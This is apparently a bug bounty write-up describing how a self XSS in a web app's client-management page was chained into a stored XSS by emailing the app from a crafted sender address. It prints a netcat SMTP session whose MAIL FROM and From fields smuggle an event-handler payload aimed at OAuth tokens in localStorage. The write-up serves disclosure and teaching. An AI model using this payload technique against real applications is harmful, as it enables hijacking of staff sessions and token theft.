If you are reading this you are probably wondering what is this? is this some kind of a joke? The answer is No, and it is not a clickbait, this is the story of chaining small issues and pivoting from a self XSS to a fully blown Stored XSS.
The journey began when i started hacking on a private program, and while doing my research i came across a self XSS issue which hey were aware of and it was explicitly out of scope. So i kept digging and started to learn how the app worked, it had CRM and other related stuff which is not really important for now. The app had multiple parts and one of them was client management with regular functionalities like create/delete/modify clients, create/attach invoices… the self xss existed in the information fields of the client’s view.
By adding a simple ‘ to the email i was able to break the html and then add my own attributes.
After some more digging i found out that if you send an email to the invoice email address the app would check if the email address of the sender existed in the client’s database and if found it would create a new ticket for that client but what if we send an email from a non client address? A new client is created along side with the new ticket.
Now since i can control parts of client information (email address), i need to be able to send really miss formed emails and the easiest way to do that is to use NETCAT. So i just opened a new terminal queried for their email server and started building the exploit.
First i had to build a working XSS then i had to figure out which characters break the SMTP syntax and encode them, ended up with a an email like this
The final attack looked something like this
nc -C mxa.mailgun.org 25
>MAIL FROM: <'onmouseover='alert(localStorage.oauth)'@plenumsec.com>
>RCPT TO: <firstname.lastname@example.org>
From: Attacker <'onmouseover='alert(localStorage.oauth)'@plenumsec.com>
To: Victim <email@example.com>
Date: Wed, 26 Sep 2018 14:21:26 -0400
This is a stored xss poc.
Now an attacker would just wait for the employee to visit the client management page or perform any action that includes the attacker’s email. The company email was completely guessable and thus could be targeted by just bruteforcing and automating the process.
One would argue that this attack could have been avoided by implementing SPF but sometimes security is not convenient for businesses so they have to make compromises.
Thanks for reading,